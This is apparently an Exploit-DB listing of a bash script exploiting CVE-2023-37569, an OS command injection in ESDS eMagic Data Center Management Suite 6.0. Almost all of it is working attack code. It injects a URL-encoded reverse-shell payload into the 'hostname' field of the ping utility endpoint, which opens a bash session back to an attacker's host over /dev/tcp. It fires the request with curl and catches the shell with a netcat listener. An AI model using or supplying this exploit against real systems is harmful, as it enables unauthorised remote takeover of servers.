
8 changes to exploits/shellcodes/ghdb Lucee 5.4.2.17 - Authenticated Reflected XSS Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure Emagic Data Center Management Suite v6.0 - OS Command Injection mooSocial 3.1.8 - Reflected XSS PHPJabbers Vacation Rental Script 4.0 - CSRF Social-Commerce 3.1.6 - Reflected XSS Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
49 lines
No EOL
1.1 KiB
Bash
Executable file
49 lines
No EOL
1.1 KiB
Bash
Executable file
#!/bin/bash
|
|
|
|
# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
|
|
# Date: 03-08-2023
|
|
# Exploit Author: Shubham Pandey & thewhiteh4t
|
|
# Vendor Homepage: https://www.esds.co.in/enlight360
|
|
# Version: 6.0.0
|
|
# Tested on: Kali Linux
|
|
# CVE : CVE-2023-37569
|
|
|
|
URL=$1
|
|
LHOST=$2
|
|
LPORT=$3
|
|
|
|
echo "*****************************"
|
|
echo "* ESDS eMagic 6.0.0 RCE *"
|
|
echo "* > CVE-2023-37569 *"
|
|
echo "* > Shubham & thewhiteh4t *"
|
|
echo "*****************************"
|
|
|
|
if [ $# -lt 3 ]; then
|
|
echo """
|
|
USAGE :
|
|
|
|
./exploit.sh http://<IP> <LHOST> <LPORT>
|
|
./exploit.sh http://192.168.0.10 192.168.0.20 1337
|
|
"""
|
|
exit 1
|
|
fi
|
|
|
|
url="$1/index.php/monitor/operations/utilities/"
|
|
|
|
echo "[+] URL : $URL"
|
|
echo "[+] LHOST : $LHOST"
|
|
echo "[+] LPORT : $LPORT"
|
|
echo
|
|
|
|
payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
|
|
|
|
post_data="utility=ping&operations=yes&hostname=%3B%20$payload¶m_before=¶m_after=&probe_id=1&rndval=1682490204846"
|
|
|
|
echo "[!] Triggering exploit..."
|
|
|
|
echo $url
|
|
|
|
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
|
|
|
|
echo "[+] Catching shell..."
|
|
nc -lvp 4444 |